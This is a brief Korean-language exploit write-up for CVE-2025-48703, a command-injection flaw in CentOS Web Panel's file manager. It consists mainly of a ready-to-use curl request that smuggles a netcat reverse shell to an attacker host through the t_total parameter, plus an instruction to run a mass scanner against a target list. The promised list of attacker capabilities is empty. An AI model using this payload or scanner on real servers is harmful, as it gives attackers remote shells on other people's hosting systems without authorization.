
CentOS 웹 패널의 원격 코드 실행
CVE-2025-48703은 웹 호스팅 제어판(예: cPanel)의 filemanager 모듈에서 발생하는 원격 코드 실행(RCE) 취약점입니다. 이는 acc=changePerm 함수의 살균되지 않은 입력 처리로 인해 발생하며, 공격자가 t_total 매개변수를 사용하여 임의의 시스템 명령을 주입하고 실행할 수 있게 합니다.
이 취약점으로 공격자는 다음을 수행할 수 있습니다:
⚠️ 이 공격은 최소한의 인증으로 수행될 수 있으며, 일부 구성에서는 인증 없이도 액세스할 수 있습니다.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv